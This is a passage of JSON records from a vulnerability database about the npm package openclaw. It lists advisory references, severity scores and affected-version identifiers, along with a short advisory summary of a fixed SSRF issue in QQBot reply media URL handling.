                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v8wv-jg3q-qwpq",
                    "reference_id": "GHSA-v8wv-jg3q-qwpq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v8wv-jg3q-qwpq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-33581",
                "GHSA-v8wv-jg3q-qwpq"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9jjv-aa8k-rke1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89809?format=api",
            "vulnerability_id": "VCID-9kgh-wj9w-ykff",
            "summary": "OpenClaw: QQBot reply media URL handling could trigger SSRF and re-upload fetched bytes\n## Summary\n\nQQBot reply media URL handling could trigger SSRF and re-upload fetched bytes.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nQQBot reply media URLs could be treated as trusted media sources, allowing SSRF fetches whose returned bytes were then re-uploaded through the channel.\n\n## Technical Details\n\nThe fix routes QQBot remote media fetches through SSRF-guarded media fetching and explicit URL allowlist policy.\n\n## Fix\n\nThe issue was fixed in #63495 and #65788. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a`\n- `ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d`\n- PR: #63495, #65788\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @threalwinky for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43526",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12834",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14131",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14168",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43526"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/08ae021d1f42905a85a550813c0d95169b171a6c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/08ae021d1f4f02e0ca5fd8a3b9659291c1ecf95a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ddb7a8dd80b8d5dd04aafa44ce7a4354b568bb2d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63495",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63495"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/65788",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/65788"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2767-2q9v-9326"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43526",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43526"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:24:17Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-qqbot-reply-media-url-handling"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2767-2q9v-9326",
                    "reference_id": "GHSA-2767-2q9v-9326",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2767-2q9v-9326"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.12",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
